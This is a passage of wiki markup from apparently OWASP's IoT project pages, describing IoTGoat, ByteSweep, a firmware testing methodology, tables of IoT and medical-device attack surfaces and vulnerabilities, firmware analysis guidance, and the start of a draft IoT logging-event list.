| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT security analysis platform. This platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware. A Free Software IoT Firmware Security Analysis Platform<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and Information Security professionals with conducting firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relative technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Attain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution<br />
|}The full methodology release can be downloaded via the following TBD. <br />
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
*Attack walkthroughs<br />
*Tool usage examples<br />
*Screenshots<br />
*Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki> <br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* TBD<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|<br />
|}{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
